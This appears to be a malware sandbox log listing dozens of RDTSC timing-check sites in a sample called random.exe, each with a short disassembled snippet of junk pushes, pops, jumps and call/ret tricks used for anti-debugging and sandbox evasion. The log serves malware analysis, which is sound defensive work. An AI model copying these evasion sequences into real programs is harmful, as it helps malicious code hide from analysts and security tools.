Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9001F3 second address: 9001F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9001F7 second address: 90020C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 90210A second address: 902127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19A4F65049h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 902127 second address: 90212B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 90418D second address: 9041A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F6503Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 90212B second address: 9021A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F19A4DEDF28h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push dword ptr fs:[00000000h] 0x0000002a movzx edi, si 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F19A4DEDF28h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e mov ebx, dword ptr [ebp+122D2BC1h] 0x00000054 mov eax, dword ptr [ebp+122D0599h] 0x0000005a or dword ptr [ebp+122D33BDh], eax 0x00000060 mov dword ptr [ebp+122D1B88h], eax 0x00000066 push FFFFFFFFh 0x00000068 sub di, 3388h 0x0000006d push eax 0x0000006e pushad 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 904FB2 second address: 905037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F19A4F65046h 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 mov edi, dword ptr [ebp+122D2BA5h] 0x0000001b mov bh, 0Dh 0x0000001d push 00000000h 0x0000001f mov edi, ecx 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ecx 0x00000026 call 00007F19A4F65038h 0x0000002b pop ecx 0x0000002c mov dword ptr [esp+04h], ecx 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc ecx 0x00000039 push ecx 0x0000003a ret 0x0000003b pop ecx 0x0000003c ret 0x0000003d xchg eax, esi 0x0000003e jmp 00007F19A4F6503Ch 0x00000043 push eax 0x00000044 jc 00007F19A4F65055h 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F19A4F65047h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 904373 second address: 904377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9051BD second address: 9051D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F19A4F6503Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 910418 second address: 91041C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 91041C second address: 910422 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 910422 second address: 910439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F19A4DEDF31h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 910439 second address: 910445 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F19A4F6503Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 90FBBA second address: 90FBBF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 90FE8F second address: 90FEC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F19A4F65048h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F19A4F65041h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 90FEC9 second address: 90FECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 914DF4 second address: 914E1E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F19A4F65048h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F19A4F6503Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 914E1E second address: 914E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B20F7 second address: 8B20FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B20FD second address: 8B2107 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F19A4DEDF40h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B2107 second address: 8B2126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19A4F65044h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B2126 second address: 8B213D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F19A4DEDF26h 0x0000000a jmp 00007F19A4DEDF2Ch 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B213D second address: 8B2143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 919C7C second address: 919C88 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F19A4DEDF26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 919C88 second address: 919CAF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F19A4F65036h 0x0000000e jmp 00007F19A4F65049h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 919CAF second address: 919CD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 919CD3 second address: 919CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 919CD9 second address: 919D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F19A4DEDF26h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F19A4DEDF37h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 919D03 second address: 919D15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19A4F6503Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 919D15 second address: 919D19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 919E3E second address: 919E44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 919E44 second address: 919E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 919E4F second address: 919E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19A4F65045h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 919E6D second address: 919E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 919E71 second address: 919E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 919FDA second address: 919FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 91A450 second address: 91A454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 91A454 second address: 91A458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 91A72B second address: 91A746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F19A4F65036h 0x0000000a je 00007F19A4F65036h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F19A4F65036h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 91A746 second address: 91A764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF38h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 91A764 second address: 91A774 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F6503Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 91A774 second address: 91A778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 91A778 second address: 91A78D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F65041h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 91A910 second address: 91A916 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8ED24D second address: 8ED253 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8ED253 second address: 8ED2AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F19A4DEDF38h 0x0000000f nop 0x00000010 adc dh, FFFFFFDFh 0x00000013 lea eax, dword ptr [ebp+12482013h] 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F19A4DEDF28h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 stc 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8ED2AE second address: 8ED2B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8ED2B4 second address: 8ED2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8ED492 second address: 8ED49C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F19A4F65036h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8ED9C3 second address: 8ED9C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8ED9C8 second address: 8ED9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EDD5F second address: 8EDD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EDD63 second address: 8EDD9B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F19A4F65036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edx, dword ptr [ebp+122D19B2h] 0x00000013 jmp 00007F19A4F6503Bh 0x00000018 push 00000004h 0x0000001a or dword ptr [ebp+122D26C1h], edi 0x00000020 nop 0x00000021 pushad 0x00000022 push ebx 0x00000023 jc 00007F19A4F65036h 0x00000029 pop ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c jnp 00007F19A4F65036h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EDD9B second address: 8EDD9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EDD9F second address: 8EDDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F19A4F65045h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EDDC0 second address: 8EDDCA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F19A4DEDF26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EE4DE second address: 8EE555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jng 00007F19A4F6503Ch 0x0000000e jc 00007F19A4F65036h 0x00000014 jmp 00007F19A4F65045h 0x00000019 popad 0x0000001a nop 0x0000001b jmp 00007F19A4F65042h 0x00000020 lea eax, dword ptr [ebp+12482057h] 0x00000026 movzx edx, cx 0x00000029 nop 0x0000002a push ecx 0x0000002b push esi 0x0000002c jc 00007F19A4F65036h 0x00000032 pop esi 0x00000033 pop ecx 0x00000034 push eax 0x00000035 jnl 00007F19A4F6503Ch 0x0000003b nop 0x0000003c mov ecx, dword ptr [ebp+122D1C1Ch] 0x00000042 lea eax, dword ptr [ebp+12482013h] 0x00000048 mov edx, dword ptr [ebp+122D2B6Dh] 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push edi 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EE555 second address: 8EE55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EE55A second address: 8D57D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F65047h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F19A4F65038h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 clc 0x00000027 call dword ptr [ebp+122D2005h] 0x0000002d pushad 0x0000002e pushad 0x0000002f push edi 0x00000030 pop edi 0x00000031 jns 00007F19A4F65036h 0x00000037 pushad 0x00000038 popad 0x00000039 popad 0x0000003a push eax 0x0000003b push edx 0x0000003c jnl 00007F19A4F65036h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 91E1F7 second address: 91E227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F19A4DEDF4Ch 0x0000000a jmp 00007F19A4DEDF32h 0x0000000f jmp 00007F19A4DEDF34h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 91EC43 second address: 91EC4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 91EC4B second address: 91EC58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F19A4DEDF2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 91EC58 second address: 91EC66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F19A4F6503Eh 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9260BA second address: 9260BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9260BE second address: 9260C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8AD034 second address: 8AD038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8AD038 second address: 8AD03C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 92C278 second address: 92C28D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19A4DEDF2Eh 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 92C28D second address: 92C2A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F19A4F65036h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pushad 0x0000000d jnp 00007F19A4F65047h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 92C2A2 second address: 92C2BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19A4DEDF2Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F19A4DEDF26h 0x00000011 jg 00007F19A4DEDF26h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 92C3E3 second address: 92C3E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 92C3E7 second address: 92C3FA instructions: 0x00000000 rdtsc 0x00000002 je 00007F19A4DEDF26h 0x00000008 jbe 00007F19A4DEDF26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 92C55A second address: 92C58A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F6503Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F19A4F65042h 0x0000000e jmp 00007F19A4F6503Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 92C58A second address: 92C58E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 92C58E second address: 92C594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 92C865 second address: 92C8A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F19A4DEDF36h 0x0000000b jnc 00007F19A4DEDF26h 0x00000011 popad 0x00000012 jmp 00007F19A4DEDF37h 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F19A4DEDF26h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B55DA second address: 8B55F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F6503Dh 0x00000007 jmp 00007F19A4F6503Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 931ACF second address: 931ADD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F19A4DEDF28h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 931ADD second address: 931AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 931F04 second address: 931F08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 934FD3 second address: 934FF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F65048h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 934B2D second address: 934B31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 934B31 second address: 934B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jnp 00007F19A4F65036h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 934B45 second address: 934B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 937BA6 second address: 937BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 937BAA second address: 937BDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF39h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F19A4DEDF33h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 937D28 second address: 937D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F19A4F65036h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93D6A8 second address: 93D6AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93D6AE second address: 93D6B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93D6B4 second address: 93D6B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93D6B8 second address: 93D6BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
